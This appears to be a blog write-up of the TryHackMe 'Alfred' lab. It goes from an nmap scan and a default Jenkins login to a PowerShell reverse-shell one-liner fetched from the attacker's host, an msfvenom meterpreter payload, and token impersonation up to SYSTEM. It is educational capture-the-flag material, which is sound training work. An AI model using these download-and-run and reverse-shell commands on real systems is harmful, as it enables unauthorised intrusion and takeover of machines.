THM - Alfred

Alfred

skibum 8/30/2020

Enumeration and initial shell

  1. NMAP scan

    nmap -sV -sT -Pn -oX nmap/intial <Machine_IP>
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT
    Nmap scan report for <Machine_IP>
    Host is up (0.22s latency).
    Not shown: 997 filtered ports
    PORT     STATE SERVICE            VERSION
    80/tcp   open  http               Microsoft IIS httpd 7.5
    3389/tcp open  ssl/ms-wbt-server?
    8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
    
  2. There are two ports with web servers on them
    2.1. Port 80 which just contains a RIP for Bruce Wane
    2.2. Port 8080 is a login for Jenkins

  3. Check for default login values.
    Test username:Password as admin:admin

    • This worked to grant us access.
  4. From the main menu select project in the center > Select configure this allow you to modify the code to be run on the underlining system.

    powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
    
  5. Run a python3 -m http.server and nc -nlvp 1337 before building the project.

  6. A user shell is now avaible.

Priv esc

  1. Generate a meterperter shell

    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe  
    
  2. Download to the shell

    powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')" 
    
  3. Set the multi handler with the windows/meterpreter/reverse_tcp payload

  4. Run the exploit on the msfconsole and then run the exe on the shell.

  5. With the meterperter shell up check the privileges.

    PS> whoami /priv
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                  Description                               State   
    =============================== ========================================= ========
    SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
    SeSecurityPrivilege             Manage auditing and security log          Disabled
    SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
    SeLoadDriverPrivilege           Load and unload device drivers            Disabled
    SeSystemProfilePrivilege        Profile system performance                Disabled
    SeSystemtimePrivilege           Change the system time                    Disabled
    SeProfileSingleProcessPrivilege Profile single process                    Disabled
    SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
    SeCreatePagefilePrivilege       Create a pagefile                         Disabled
    SeBackupPrivilege               Back up files and directories             Disabled
    SeRestorePrivilege              Restore files and directories             Disabled
    SeShutdownPrivilege             Shut down the system                      Disabled
    SeDebugPrivilege                Debug programs                            Enabled 
    SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
    SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
    SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
    SeUndockPrivilege               Remove computer from docking station      Disabled
    SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
    SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege         Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
    SeTimeZonePrivilege             Change the time zone                      Disabled
    SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
    
  6. As the SeImpersonatePrivilege is enables lets try and impersonate it. Load the load incognito module in the meterpreter session

  7. Lets list the tokens

    list_tokens -g
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    \
    BUILTIN\Administrators
    BUILTIN\IIS_IUSRS
    BUILTIN\Users
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\NTLM Authentication
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\AppHostSvc
    NT SERVICE\AudioEndpointBuilder
    NT SERVICE\BFE
    NT SERVICE\CertPropSvc
    NT SERVICE\CscService
    NT SERVICE\Dnscache
    NT SERVICE\eventlog
    NT SERVICE\EventSystem
    NT SERVICE\FDResPub
    NT SERVICE\iphlpsvc
    NT SERVICE\LanmanServer
    NT SERVICE\MMCSS
    NT SERVICE\PcaSvc
    NT SERVICE\PlugPlay
    NT SERVICE\RpcEptMapper
    NT SERVICE\Schedule
    NT SERVICE\SENS
    NT SERVICE\SessionEnv
    NT SERVICE\Spooler
    NT SERVICE\TrkWks
    NT SERVICE\UmRdpService
    NT SERVICE\UxSms
    NT SERVICE\WdiSystemHost
    NT SERVICE\Winmgmt
    NT SERVICE\WSearch
    NT SERVICE\wuauserv
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\NETWORK
    NT SERVICE\AudioSrv
    NT SERVICE\CryptSvc
    NT SERVICE\DcomLaunch
    NT SERVICE\Dhcp
    NT SERVICE\DPS
    NT SERVICE\LanmanWorkstation
    NT SERVICE\lmhosts
    NT SERVICE\MpsSvc
    NT SERVICE\netprofm
    NT SERVICE\nsi
    NT SERVICE\PolicyAgent
    NT SERVICE\Power
    NT SERVICE\ShellHWDetection
    NT SERVICE\W32Time
    NT SERVICE\WdiServiceHost
    NT SERVICE\WinHttpAutoProxySvc
    NT SERVICE\wscsvc
    
  8. Since the BUILTIN\Administrators is available lest try and impersonate it impersonate_token "BUILTIN\Administrators"

  9. We are now the NT AUTHORITY\SYSTEM lets migrate the permissions to make sure we maintain it

  10. Use the PS command to list the processes and check for the services.exe process. It was 668!

  11. Now lets migrate the permissions migrate 668

  12. P0wn3d!!! now read the root.txt file at C:\Windows\System32\config


You'll only receive email when they publish something new.

More from sk18um
All posts